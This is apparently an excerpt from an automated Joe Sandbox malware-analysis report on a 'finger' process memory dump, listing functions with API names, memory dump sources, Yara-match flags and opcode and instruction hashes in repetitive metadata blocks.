                                                              • Opcode Fuzzy Hash: be32dfa56d30c3f420fd89ec5cc1aeedab87014bef5d2ad5ca23fe37e367ef13
                                                              • Instruction Fuzzy Hash: 4D900265212414034105B1584414616401A87E0201B55C021E2014590DC62589D16125
                                                              Function 032C2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5e6dd69fb5db4cd0087f45042d7c00ce12245baf46d259a99196c6933553e77a
                                                              • Instruction ID: b944497c2ac361b8d3dae29828a13604f7f79170bb81f2bc9982a6c25cbffdf7
                                                              • Opcode Fuzzy Hash: 5e6dd69fb5db4cd0087f45042d7c00ce12245baf46d259a99196c6933553e77a
                                                              • Instruction Fuzzy Hash: F890043571541C03D150F15C44147470015C7D0301F55C011F1034754DC755CFD577F1
                                                              Function 032C2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f0e4b363008d233613640516718de908853f606166341a9db1ad154f1ac005a1
                                                              • Instruction ID: 2b9249b79c5270e668d31b203b0dcb88f8cb9e8022bd070b989544eced49e117
                                                              • Opcode Fuzzy Hash: f0e4b363008d233613640516718de908853f606166341a9db1ad154f1ac005a1
                                                              • Instruction Fuzzy Hash: 4390023521545C42D140B1584404A46002587D0305F55C011A1064694D97258E95B661
                                                              Function 032C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e60c5edd05327f9a741c99cf4219836660d2b07b25739b11b8597d258ec96fe0
                                                              • Instruction ID: 2002594270649ea60cba57fe24682524861bc9e5304bce96fda60fe5e850ce38
                                                              • Opcode Fuzzy Hash: e60c5edd05327f9a741c99cf4219836660d2b07b25739b11b8597d258ec96fe0
                                                              • Instruction Fuzzy Hash: 3990023521141C02D180B158440464A001587D1301F95C015A1025654DCB158B9977A1
                                                              Function 032C2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 483d8d08dcc884aa7b2ea9de5487902550d219ad07acaa650dab5256e907d952
                                                              • Instruction ID: 4aa041df233e0283477c31b896e3148914c89d9dedc8a0f5884b536371326aab
                                                              • Opcode Fuzzy Hash: 483d8d08dcc884aa7b2ea9de5487902550d219ad07acaa650dab5256e907d952
                                                              • Instruction Fuzzy Hash: FE900229231414020145F558060450B045597D6351395C015F2416590CC72189A55321
                                                              Function 032C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5ae2e85e0c042f0054418d7e58552798f45228401970487a8a2632da805a24e8
                                                              • Instruction ID: ab87efea4485dfc199705ccf851009ffafc09bca01f757f34846777fc1abf054
                                                              • Opcode Fuzzy Hash: 5ae2e85e0c042f0054418d7e58552798f45228401970487a8a2632da805a24e8
                                                              • Instruction Fuzzy Hash: E890043D331414030105F55C07045070057C7D5351355C031F3015550CD731CDF15131
                                                              Function 032C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4946484c548444c2a80a6b5cf29b078f353b3ca69d1e03384783d21c25f49530
                                                              • Instruction ID: 3f0b657a2463e81921aee61bcd4cb68efe001bf08b02c3d6dfcb387c4736c0b0
                                                              • Opcode Fuzzy Hash: 4946484c548444c2a80a6b5cf29b078f353b3ca69d1e03384783d21c25f49530
                                                              • Instruction Fuzzy Hash: CF90026535141842D100B1584414B060015C7E1301F55C015E2064554D8719CD926126
                                                              Function 032C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9936fe9ee8bc01859120f992c235dd66cc8618cd5eace7fd6f05dbac901347a9
                                                              • Instruction ID: 0499f5329f231d21c61179efc6bdbf3d2676c99cdc994fb43219c1329666a8bc
                                                              • Opcode Fuzzy Hash: 9936fe9ee8bc01859120f992c235dd66cc8618cd5eace7fd6f05dbac901347a9
                                                              • Instruction Fuzzy Hash: 07900225611414424140B16888449064015ABE1211755C121A1998550D865989A55665
                                                              Function 032C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5e5cc4d053382a120532333e0114cb14f2ae5c98e850d9b8abc344097028946e
                                                              • Instruction ID: a690e302b6ca4ffc36c28902edbe7d04e3703708f480cc5e460d567d9910e443
                                                              • Opcode Fuzzy Hash: 5e5cc4d053382a120532333e0114cb14f2ae5c98e850d9b8abc344097028946e
                                                              • Instruction Fuzzy Hash: F3900225221C1442D200B5684C14B07001587D0303F55C115A1154554CCA1589A15521
                                                              Function 032C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a306f25142da3369fb5c0aace62c10c936ef7abb441a2ca61b6ab9c83197dfd7
                                                              • Instruction ID: 64397727308088e09c81ad56c401e05d773adfd3a9ee482a1eb47ced0d3d8982
                                                              • Opcode Fuzzy Hash: a306f25142da3369fb5c0aace62c10c936ef7abb441a2ca61b6ab9c83197dfd7
                                                              • Instruction Fuzzy Hash: BE90022561141902D101B1584404616001A87D0241F95C022A2024555ECB258AD2A131
                                                              Function 032C2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 52f14384ef778a3809ff7cc8864951672cf26401c3f4ff439a72fa05e41e1f02
                                                              • Instruction ID: f7269772387fa3bd0531b57ecbad56f36624e1c1dc49091b913b0a74093dc665
                                                              • Opcode Fuzzy Hash: 52f14384ef778a3809ff7cc8864951672cf26401c3f4ff439a72fa05e41e1f02
                                                              • Instruction Fuzzy Hash: 1390026521181803D140B5584804607001587D0302F55C011A3064555E8B298D916135
                                                              Function 032C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 29a97bf626962d85cf2ab9c567a3713e01aec514fee6e5b6211e824b218f7ecf
                                                              • Instruction ID: 2f1675733d133693df72ab1d2d4c045e017f21d82db2819293bfc6aa5f1b4a12
                                                              • Opcode Fuzzy Hash: 29a97bf626962d85cf2ab9c567a3713e01aec514fee6e5b6211e824b218f7ecf
                                                              • Instruction Fuzzy Hash: AC90043531141403D140F15C541C7074015D7F1301F55D011F1414554CDF15CDD75333
                                                              Function 032C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2fcf2705a8b209810c2256d502c3c58f0fdbee92512a8c80805e9b433218a915
                                                              • Instruction ID: db049098ca062a2bcea82e95d885c584bb1f4a45220b9e44f18c0651546df5d8
                                                              • Opcode Fuzzy Hash: 2fcf2705a8b209810c2256d502c3c58f0fdbee92512a8c80805e9b433218a915
                                                              • Instruction Fuzzy Hash: DA90022D22341402D180B158540860A001587D1202F95D415A1015558CCA1589A95321
                                                              Function 032C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 488a5a47aeb77e117abc9f97850403e292b4e7ede5a821476d0f2606d6b9a57d
                                                              • Instruction ID: 64b40e384864c032cb6f457643331570379c66d6232a1bf80c70441574f871e9
                                                              • Opcode Fuzzy Hash: 488a5a47aeb77e117abc9f97850403e292b4e7ede5a821476d0f2606d6b9a57d
                                                              • Instruction Fuzzy Hash: B890023521141813D111B1584504707001987D0241F95C412A1424558D97568A92A121
                                                              Function 032C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1ad3abc69163c0611161d2d0fa9abf5097f50557bd233ee98351e5802ff1f4b1
                                                              • Instruction ID: 9dd91abac64a5027d659b903bd2392aa628466fcbd3e1a7a6c3d8d1a8bab5cb9
                                                              • Opcode Fuzzy Hash: 1ad3abc69163c0611161d2d0fa9abf5097f50557bd233ee98351e5802ff1f4b1
                                                              • Instruction Fuzzy Hash: 4B900225252455525545F1584404507401697E0241795C012A2414950C86269996D621
                                                              Function 032C2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 630a7d9e2b64581dfb262c2dfa5b3e2132f28835bac02b1392b75a2e8a339769
                                                              • Instruction ID: 799bd37726d86a0eceb6ff8e192d6455ddbee90f33ca842fdce9364804858ac2
                                                              • Opcode Fuzzy Hash: 630a7d9e2b64581dfb262c2dfa5b3e2132f28835bac02b1392b75a2e8a339769
                                                              • Instruction Fuzzy Hash: 9590043531141C43D100F15C4404F470015C7F0301F55C017F1134754DC715CDD17531
                                                              Function 032C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a6ffbd81d2ed850a923c1f34e5a906787be592316325b3cc7196e07b40670a0d
                                                              • Instruction ID: 65561b1897da6c2b74b43fbd829d9eda5e2cb63ba1e6752c2b3ab3e17f3a5831
                                                              • Opcode Fuzzy Hash: a6ffbd81d2ed850a923c1f34e5a906787be592316325b3cc7196e07b40670a0d
                                                              • Instruction Fuzzy Hash: 1A90023521149C02D110B158840474A001587D0301F59C411A5424658D879589D17121
                                                              Function 032C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bd1d037e5aeae7a90df1b0f41cd19eb3dcb8a32c70c5cf1ea79f2121ff588bea
                                                              • Instruction ID: 77d4324e3d78e70afdff5ab4b4a16398eb4a6b8452091ebd3538affc08b3e2cf
                                                              • Opcode Fuzzy Hash: bd1d037e5aeae7a90df1b0f41cd19eb3dcb8a32c70c5cf1ea79f2121ff588bea
                                                              • Instruction Fuzzy Hash: C490023521141802D100B5985408646001587E0301F55D011A6024555EC76589D16131
                                                              Function 032C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4414f32281f17e0c3068023cf6df64479c187941f5dbc85ad3038cafab1316b6
                                                              • Instruction ID: 9b3481a6262576aa0bfe2326a1dcfe5fc1e7ac002d854d45d7f07c44bf944490
                                                              • Opcode Fuzzy Hash: 4414f32281f17e0c3068023cf6df64479c187941f5dbc85ad3038cafab1316b6
                                                              • Instruction Fuzzy Hash: E690023561551802D100B1584514706101587D0201F65C411A1424568D87958A9165A2
                                                              Function 032C39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4175aa7ea41ad7c634b23457375d8fb4253b7f049e70a82788b3a421a64a750a
                                                              • Instruction ID: 16c2c80118fbf208e03a801c5707bc193d1c122dbd2bf868395471aad8c36b83
                                                              • Opcode Fuzzy Hash: 4175aa7ea41ad7c634b23457375d8fb4253b7f049e70a82788b3a421a64a750a
                                                              • Instruction Fuzzy Hash: 5690022525546502D150B15C44046164015A7E0201F55C021A1814594D865589956221
                                                              Function 02940F5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02940FED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                              • Instruction ID: 9c639fb097a2bb8dc1b7e03aacffe2f28737315e119a83c2bb3af932574c732d
                                                              • Opcode Fuzzy Hash: 62ac509af513badd59f52ff932e67a1d51426ef96a03da2f40b57a8547a2cddc
                                                              • Instruction Fuzzy Hash: F101F932E4125876EB11D690AC41FEEBB6C9F81758F008195FF18BB290DAB569028BD5
                                                              Function 02940F69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 518 2940f69-2940f80 520 2940f89-2940fde call 295c170 call 2944700 call 29313e0 call 2951e40 518->520 521 2940f84 call 295b760 518->521 530 2941000-2941005 520->530 531 2940fe0-2940ff1 PostThreadMessageW 520->531 521->520 531->530 532 2940ff3-2940ffd 531->532 532->530
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02940FED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                              • Instruction ID: ec763da7fc977a15663f550fe5442935c246f7c4bb219752a3536190c6c34e24
                                                              • Opcode Fuzzy Hash: 97573ca473f30ff0083e82b3b7025720e141c8b42e374edf9a4bd21b38e2e68e
                                                              • Instruction Fuzzy Hash: 7E118871E41358B6EB21D6A09C41FDF7F7C9F81B94F148055FA04BB2C0DAB466068BE5
                                                              Function 02940F70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 533 2940f70-2940f80 534 2940f89-2940fde call 295c170 call 2944700 call 29313e0 call 2951e40 533->534 535 2940f84 call 295b760 533->535 544 2941000-2941005 534->544 545 2940fe0-2940ff1 PostThreadMessageW 534->545 535->534 545->544 546 2940ff3-2940ffd 545->546 546->544
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02940FED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                              • Instruction ID: 989647317b36f8d3580dbc0a6fbaceab2a243d38b7c09a83081f52c21e96f45d
                                                              • Opcode Fuzzy Hash: 5b2c7bf13fbc1386b4dce6a31997c1ee6d6986f9ba4028ad4039b86e24a1e116
                                                              • Instruction Fuzzy Hash: 21019B71E4135876EB21D6909C41FDF7F7C9F81B94F148055FE047B280D6B466068BE5
                                                              Function 02953C80 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 107sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 02953D4D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2930000_finger.jbxd
                                                              Yara matches
                                                              Similarity
